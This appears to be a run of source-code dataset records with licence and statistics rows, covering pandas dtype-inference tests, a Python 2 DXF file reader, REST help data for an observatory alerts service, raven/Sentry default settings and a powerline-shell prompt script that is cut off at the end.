def test_infer_from_interval(left, right, subtype, closed, pandas_dtype):
# GH 30337
interval = Interval(left, right, closed)
result_dtype, result_value = infer_dtype_from_scalar(interval, pandas_dtype)
expected_dtype = f"interval[{subtype}, {closed}]" if pandas_dtype else np.object_
assert result_dtype == expected_dtype
assert result_value == interval
def test_infer_dtype_from_scalar_errors():
msg = "invalid ndarray passed to infer_dtype_from_scalar"
with pytest.raises(ValueError, match=msg):
infer_dtype_from_scalar(np.array([1]))
@pytest.mark.parametrize(
"value, expected, pandas_dtype",
[
("foo", np.object_, False),
(b"foo", np.object_, False),
(1, np.int64, False),
(1.5, np.float_, False),
(np.datetime64("2016-01-01"), np.dtype("M8[ns]"), False),
(Timestamp("20160101"), np.dtype("M8[ns]"), False),
(Timestamp("20160101", tz="UTC"), np.object_, False),
(Timestamp("20160101", tz="UTC"), "datetime64[ns, UTC]", True),
],
)
def test_infer_dtype_from_scalar(value, expected, pandas_dtype):
dtype, _ = infer_dtype_from_scalar(value, pandas_dtype=pandas_dtype)
assert is_dtype_equal(dtype, expected)
with pytest.raises(TypeError, match="must be list-like"):
infer_dtype_from_array(value, pandas_dtype=pandas_dtype)
@pytest.mark.parametrize(
"arr, expected, pandas_dtype",
[
([1], np.int_, False),
(np.array([1], dtype=np.int64), np.int64, False),
([np.nan, 1, ""], np.object_, False),
(np.array([[1.0, 2.0]]), np.float_, False),
(Categorical(list("aabc")), np.object_, False),
(Categorical([1, 2, 3]), np.int64, False),
(Categorical(list("aabc")), "category", True),
(Categorical([1, 2, 3]), "category", True),
(date_range("20160101", periods=3), np.dtype("=M8[ns]"), False),
(
date_range("20160101", periods=3, tz="US/Eastern"),
"datetime64[ns, US/Eastern]",
True,
),
(Series([1.0, 2, 3]), np.float64, False),
(Series(list("abc")), np.object_, False),
(
Series(date_range("20160101", periods=3, tz="US/Eastern")),
"datetime64[ns, US/Eastern]",
True,
),
],
)
def test_infer_dtype_from_array(arr, expected, pandas_dtype):
dtype, _ = infer_dtype_from_array(arr, pandas_dtype=pandas_dtype)
assert is_dtype_equal(dtype, expected)
@pytest.mark.parametrize("cls", [np.datetime64, np.timedelta64])
def test_infer_dtype_from_scalar_zerodim_datetimelike(cls):
# ndarray.item() can incorrectly return int instead of td64/dt64
val = cls(1234, "ns")
arr = np.array(val)
dtype, res = infer_dtype_from_scalar(arr)
assert dtype.type is cls
assert isinstance(res, cls)
dtype, res = infer_dtype_from(arr)
assert dtype.type is cls
| bsd-3-clause | 5,655,230,552,501,288,000 | 28.682692 | 87 | 0.627632 | false |
JohnyEngine/CNC | deprecated/heekspython/examples/dxfReader.py | 1 | 11845 | """This module provides a function for reading dxf files and parsing them into a useful tree of objects and data.
The convert function is called by the readDXF fuction to convert dxf strings into the correct data based
on their type code. readDXF expects a (full path) file name as input.
"""
# --------------------------------------------------------------------------
# DXF Reader v0.9 by Ed Blake (AKA Kitsu)
# 2008.05.08 modif.def convert() by Remigiusz Fiedler (AKA migius)
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
from dxfImportObjects import *
class Object:
"""Empty container class for dxf objects"""
def __init__(self, _type='', block=False):
"""_type expects a string value."""
self.type = _type
self.name = ''
self.data = []
def __str__(self):
if self.name:
return self.name
else:
return self.type
def __repr__(self):
return str(self.data)
def get_type(self, kind=''):
"""Despite the name, this method actually returns all objects of type 'kind' from self.data."""
if type:
objects = []
for item in self.data:
if type(item) != list and item.type == kind:
# we want this type of object
objects.append(item)
elif type(item) == list and item[0] == kind:
# we want this type of data
objects.append(item[1])
return objects
class InitializationError(Exception): pass
class StateMachine:
"""(finite) State Machine from the great David Mertz's great Charming Python article."""
def __init__(self):
self.handlers = []
self.startState = None
self.endStates = []
def add_state(self, handler, end_state=0):
"""All states and handlers are functions which return
a state and a cargo."""
self.handlers.append(handler)
if end_state:
self.endStates.append(handler)
def set_start(self, handler):
"""Sets the starting handler function."""
self.startState = handler
def run(self, cargo=None):
if not self.startState:
raise InitializationError,\
"must call .set_start() before .run()"
if not self.endStates:
raise InitializationError, \
"at least one state must be an end_state"
handler = self.startState
while 1:
(newState, cargo) = handler(cargo)
#print cargo
if newState in self.endStates:
return newState(cargo)
#break
elif newState not in self.handlers:
raise RuntimeError, "Invalid target %s" % newState
else:
handler = newState
def get_name(data):
"""Get the name of an object from its object data.
Returns a pair of (data_item, name) where data_item is the list entry where the name was found
(the data_item can be used to remove the entry from the object data). Be sure to check
name not None before using the returned values!
"""
value = None
for item in data:
if item[0] == 2:
value = item[1]
break
return item, value
def get_layer(data):
"""Expects object data as input.
Returns (entry, layer_name) where entry is the data item that provided the layer name.
"""
value = None
for item in data:
if item[0] == 8:
value = item[1]
break
return item, value
def convert(code, value):
"""Convert a string to the correct Python type based on its dxf code.
code types:
ints = 60-79, 170-179, 270-289, 370-389, 400-409, 1060-1070
longs = 90-99, 420-429, 440-459, 1071
floats = 10-39, 40-59, 110-139, 140-149, 210-239, 460-469, 1010-1059
hex = 105, 310-379, 390-399
strings = 0-9, 100, 102, 300-309, 410-419, 430-439, 470-479, 999, 1000-1009
"""
if 59 < code < 80 or 169 < code < 180 or 269 < code < 290 or 369 < code < 390 or 399 < code < 410 or 1059 < code < 1071:
value = int(float(value))
elif 89 < code < 100 or 419 < code < 430 or 439 < code < 460 or code == 1071:
value = long(float(value))
elif 9 < code < 60 or 109 < code < 150 or 209 < code < 240 or 459 < code < 470 or 1009 < code < 1060:
value = float(value)
elif code == 105 or 309 < code < 380 or 389 < code < 400:
value = int(value, 16) # should be left as string?
else: # it's already a string so do nothing
pass
return value
def findObject(infile, kind=''):
"""Finds the next occurance of an object."""
obj = False
while 1:
line = infile.readline()
if not line: # readline returns '' at eof
return False
if not obj: # We're still looking for our object code
if line.lower().strip() == '0':
obj = True # found it
else: # we are in an object definition
if kind: # if we're looking for a particular kind
if line.lower().strip() == kind:
obj = Object(line.lower().strip())
break
else: # otherwise take anything non-numeric
if line.lower().strip() not in string.digits:
obj = Object(line.lower().strip())
break
obj = False # whether we found one or not it's time to start over
return obj
def handleObject(infile):
"""Add data to an object until end of object is found."""
line = infile.readline()
if line.lower().strip() == 'section':
return 'section' # this would be a problem
elif line.lower().strip() == 'endsec':
return 'endsec' # this means we are done with a section
else: # add data to the object until we find a new object
obj = Object(line.lower().strip())
obj.name = obj.type
done = False
data = []
while not done:
line = infile.readline()
if not data:
if line.lower().strip() == '0':
#we've found an object, time to return
return obj
else:
# first part is always an int
data.append(int(line.lower().strip()))
else:
data.append(convert(data[0], line.strip()))
obj.data.append(data)
data = []
def handleTable(table, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(table.data)
if name: # We should always find a name
table.data.remove(item)
table.name = name.lower()
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'table':
print "Warning: previous table not closed!"
return table
elif obj.type == 'endtab':
return table # this means we are done with the table
else: # add objects to the table until one of the above is found
table.data.append(obj)
def handleBlock(block, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(block.data)
if name: # We should always find a name
block.data.remove(item)
block.name = name
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'block':
print "Warning: previous block not closed!"
return block
elif obj.type == 'endblk':
return block # this means we are done with the table
else: # add objects to the table until one of the above is found
block.data.append(obj)
"""These are the states/functions used in the State Machine.
states:
start - find first section
start_section - add data, find first object
object - add obj-data, watch for next obj (called directly by start_section)
end_section - look for next section or eof
end - return results
"""
def start(cargo):
"""Expects the infile as cargo, initializes the cargo."""
#print "Entering start state!"
infile = cargo
drawing = Object('drawing')
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return error, (infile, "Failed to find any sections!")
def start_section(cargo):
"""Expects [infile, drawing, section] as cargo, builds a nested section object."""
#print "Entering start_section state!"
infile = cargo[0]
drawing = cargo[1]
section = cargo[2]
# read each line, if it is an object declaration go to object mode
# otherwise create a [index, data] pair and add it to the sections data.
done = False
data = []
while not done:
line = infile.readline()
if not data: # if we haven't found a dxf code yet
if line.lower().strip() == '0':
# we've found an object
while 1: # no way out unless we find an end section or a new section
obj = handleObject(infile)
if obj == 'section': # shouldn't happen
print "Warning: failed to close previous section!"
return end_section, (infile, drawing)
elif obj == 'endsec': # This section is over, look for the next
drawing.data.append(section)
return end_section, (infile, drawing)
elif obj.type == 'table': # tables are collections of data
obj = handleTable(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
elif obj.type == 'block': # the same is true of blocks
obj = handleBlock(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
else: # found another sub-object
section.data.append(obj)
else:
data.append(int(line.lower().strip()))
else: # we have our code, now we just need to convert the data and add it to our list.
data.append(convert(data[0], line.strip()))
section.data.append(data)
data = []
def end_section(cargo):
"""Expects (infile, drawing) as cargo, searches for next section."""
#print "Entering end_section state!"
infile = cargo[0]
drawing = cargo[1]
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return end, (infile, drawing)
def end(cargo):
"""Expects (infile, drawing) as cargo, called when eof has been reached."""
#print "Entering end state!"
infile = cargo[0]
drawing = cargo[1]
#infile.close()
return drawing
def error(cargo):
"""Expects a (infile, string) as cargo, called when there is an error during processing."""
#print "Entering error state!"
infile = cargo[0]
err = cargo[1]
infile.close()
print "There has been an error:"
print err
return False
def readDXF(filename):
"""Given a file name try to read it as a dxf file.
Output is an object with the following structure
drawing
header
header data
classes
class data
tables
table data
blocks
block data
entities
entity data
objects
object data
where foo data is a list of sub-objects. True object data
is of the form [code, data].
"""
infile = open(filename)
sm = StateMachine()
sm.add_state(error, True)
sm.add_state(end, True)
sm.add_state(start_section)
sm.add_state(end_section)
sm.add_state(start)
sm.set_start(start)
try:
drawing = sm.run(infile)
if drawing:
drawing.name = filename
for obj in drawing.data:
item, name = get_name(obj.data)
if name:
obj.data.remove(item)
obj.name = name.lower()
setattr(drawing, name.lower(), obj)
# Call the objectify function to cast
# raw objects into the right types of object
obj.data = objectify(obj.data)
#print obj.name
finally:
infile.close()
return drawing
if __name__ == "__main__":
filename = r".\examples\block-test.dxf"
drawing = readDXF(filename)
for item in drawing.entities.data:
print item
| apache-2.0 | -6,728,610,616,327,599,000 | 30.089239 | 121 | 0.668383 | false |
asascience-open/ooi-ui-services | ooiservices/app/m2m/help_data_12577.py | 1 | 33716 | #!/usr/bin/env python
def get_help_data_12577():
"""
Alerts and Alarms help.
Data store of information to be presented when a help request is made for port 12577.
Returns a list of dictionaries associated with various requests supported on that port.
"""
help_data = [
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of subsites with alerts and/or alarm filters.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'alertfilters/inv',
'sample_response': [ "CE01ISSM", "CE01ISSP"]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of nodes with alerts and/or alarm filters.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM',
'sample_response': [ "SBD17" ]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}/{node}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of sensors for a subsite and node with alerts and/or alarm filters.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM/SBD17',
'sample_response': [ "01-MOPAK0000" ]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}/{node}/{sensor}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and/or alarm filters for a subsite, node and sensor.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM/SBD17/01-MOPAK0000',
'sample_response': [
{
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "mopak_o_dcl_accel",
"referenceDesignator" : {
"vocab" : {
"refdes" : "CE01ISSM-SBD17-01-MOPAK0000",
"instrument" : "3-Axis Motion Pack",
"tocL1" : "Coastal Endurance",
"tocL2" : "Oregon Inshore Surface Mooring",
"tocL3" : "Surface Buoy"
},
"node" : "SBD17",
"full" : True,
"sensor" : "01-MOPAK0000",
"subsite" : "CE01ISSM"
},
"pdId" : "PD1595",
"eventId" : 4,
"alertMetadata" : {
"severity" : 2,
"description" : "test user defined alerts and alarms"
},
"alertRule" : {
"filter" : "BETWEEN_EXCLUSIVE",
"valid" : True,
"lowVal" : 1.0,
"highVal" : 1.5,
"errMessage" : None
},
"eventReceiptDelta" : 5000
}]
}]
},
{
'root': 'alertfilters',
'endpoint': 'alertfilters',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and alarms in the system.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'alertfilters',
'sample_response': [{
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "ctdpf_j_cspp_instrument",
"referenceDesignator" : {
"vocab" : None,
"node" : "XX099",
"full" : True,
"sensor" : "01-CTDPFJ999",
"subsite" : "CE01ISSP"
},
"pdId" : "PD440",
"eventId" : 1,
"alertMetadata" : {
"severity" : 2,
"description" : "Rule 9"
},
"alertRule" : {
"filter" : "GREATER",
"valid" : True,
"lowVal" : 10.0,
"highVal" : 31.0,
"errMessage" : None
},
"eventReceiptDelta" : 0
}]
}]
},
{
'root': 'alertfilters',
'endpoint': 'alertfilters/{id}',
'method': 'GET',
'permission_required': False,
'description': 'Get an alert or alarm filter by identifier.',
'data_required': True,
'data_format': [
{ 'name': 'id',
'type': 'int',
'description': 'The identifier for an alert or alarm filter.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/1',
'sample_response': {
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "ctdpf_j_cspp_instrument",
"referenceDesignator" : {
"vocab" : None,
"node" : "XX099",
"full" : True,
"sensor" : "01-CTDPFJ999",
"subsite" : "CE01ISSP"
},
"pdId" : "PD440",
"eventId" : 1,
"alertMetadata" : {
"severity" : 2,
"description" : "Rule 9"
},
"alertRule" : {
"filter" : "GREATER",
"valid" : True,
"lowVal" : 10.0,
"highVal" : 31.0,
"errMessage" : None
},
"eventReceiptDelta" : 0
}
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and alarms across all subsites. ' +
'(Some sample response content abbreviated.) Numerous optional filters.',
'data_required': False,
'data_format': [
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status.',
'valid_values': ['true', 'false', 'all'],
'default': None
},
{'name': 'results',
'type': 'int',
'description': '[Optional] Filter response result with upper limit ' +
'for values to be returned. (positive integer)',
'valid_values': None,
'default': None
},
{'name': 'sortorder',
'type': 'str',
'description': '[Optional] Filter response results in ascending or ' +
'descending order. The default is descending order.',
'valid_values': ['dsc', 'asc'],
'default': 'dsc'
}
],
'samples': [{
'sample_request': 'alertalarms',
'sample_response': [ {
"severity" : 1,
"method" : None,
"message" : "Stream statuses: degraded: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.49610252096E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496102530200,
"acknowledgeTime" : None,
"acknowledgedBy" : None,
"acknowledged" : False,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "degraded",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865817
}]
},
{
'sample_request': 'alertalarms?results=2&acknowledged=true',
'sample_response': [ {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.496016060937E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496016070167,
"acknowledgeTime" : 1496102470174,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865811
}, {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1, notTracked: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.496012463445E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496012470254,
"acknowledgeTime" : 1496030470221,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "PC03A",
"subsite" : "RS03AXPS",
"sensor" : "4B-PHSENA302",
"eventId" : 6865810
} ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/{eventId}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a single alert or alarm for the eventId provided.',
'data_required': True,
'data_format': [
{'name': 'eventId',
'type': 'int',
'description': 'The alarm eventId value.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/6865817',
'sample_response': [ {
"severity" : 1,
"method" : None,
"message" : "Stream statuses: degraded: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.49610252096E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496102530200,
"acknowledgeTime" : None,
"acknowledgedBy" : None,
"acknowledged" : False,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "degraded",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865817
}]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv',
'method': 'GET',
'permission_required': False,
'description': 'Get list of unique subsites with alerts or alarms. ' +
'Optional filter by acknowledgment status.',
'data_required': False,
'data_format': [{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}],
'samples': [{
'sample_request': 'alertalarms/inv',
'sample_response': [ "RS03ASHS", "GI01SUMO", "CE02SHBP", "CE01ISSM"]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite provided, get list of unique node(s) ' +
'with alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS',
'sample_response': [ "MJ03B" ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}/{node}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite and node provided, get list of unique sensor(s) ' +
'with alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS/MJ03B',
'sample_response': [ "07-TMPSFA301" ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}/{node}/{sensor}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite, node and sensor provided, get list of ' +
'alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS/MJ03B/07-TMPSFA301?acknowledged=true',
'sample_response': [ {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.490303941683E12,
"maxMessageLenght" : 4096,
"storeTime" : 1490303955867,
"acknowledgeTime" : 1495783154043,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "MJ03B",
"subsite" : "RS03ASHS",
"sensor" : "07-TMPSFA301",
"eventId" : 6864312
} ]
}]
}
]
return help_data
| apache-2.0 | 5,930,066,804,793,597,000 | 62.615094 | 124 | 0.252402 | false |
mtrdesign/pylogwatch | pylogwatch/raven/conf/defaults.py | 1 | 2071 | """
raven.conf.defaults
~~~~~~~~~~~~~~~~~~~
Represents the default values for all Sentry settings.
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import os.path
import socket
ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
# Allow local testing of Sentry even if DEBUG is enabled
DEBUG = False
# This should be the full URL to sentries store view
SERVERS = None
TIMEOUT = 5
# TODO: this is specific to Django
CLIENT = 'raven.contrib.django.DjangoClient'
# Not all environments have access to socket module, for example Google App Engine
# Need to check to see if the socket module has ``gethostname``, if it doesn't we
# will set it to None and require it passed in to ``Client`` on initializtion.
NAME = socket.gethostname() if hasattr(socket, 'gethostname') else None
# Superuser key -- will be used if set, otherwise defers to
# SECRET_KEY and PUBLIC_KEY
KEY = None
# Credentials to authenticate with the Sentry server
SECRET_KEY = None
PUBLIC_KEY = None
# We allow setting the site name either by explicitly setting it with the
# SENTRY_SITE setting, or using the django.contrib.sites framework for
# fetching the current site. Since we can't reliably query the database
# from this module, the specific logic is within the SiteFilter
SITE = None
# Extending this allow you to ignore module prefixes when we attempt to
# discover which function an error comes from (typically a view)
EXCLUDE_PATHS = []
# By default Sentry only looks at modules in INSTALLED_APPS for drilling down
# where an exception is located
INCLUDE_PATHS = []
# The maximum number of elements to store for a list-like structure.
MAX_LENGTH_LIST = 50
# The maximum length to store of a string-like structure.
MAX_LENGTH_STRING = 400
# Automatically log frame stacks from all ``logging`` messages.
AUTO_LOG_STACKS = False
# Client-side data processors to apply
PROCESSORS = (
'raven.processors.SanitizePasswordsProcessor',
)
# Default Project ID
PROJECT = 1
| gpl-3.0 | -8,137,903,970,246,429,000 | 28.585714 | 82 | 0.750845 | false |
LeonardoGentile/powerline-shell | powerline-shell.old.py | 1 | 15940 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
import sys
def warn(msg):
print '[powerline-bash] ', msg
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg, separator or self.separator,
separator_fg or bg))
def draw(self):
return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset).encode('utf-8')
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0],
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
try:
cwd = os.getcwd()
except:
cwd = os.getenv('PWD') # This is where the OS thinks we are
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
try:
os.chdir(up)
except:
warn("Your current directory is invalid.")
sys.exit(1)
warn("Your current directory is invalid. Lowest valid directory: " + up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-only', action='store_true',
help='Only show the current directory')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd())
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
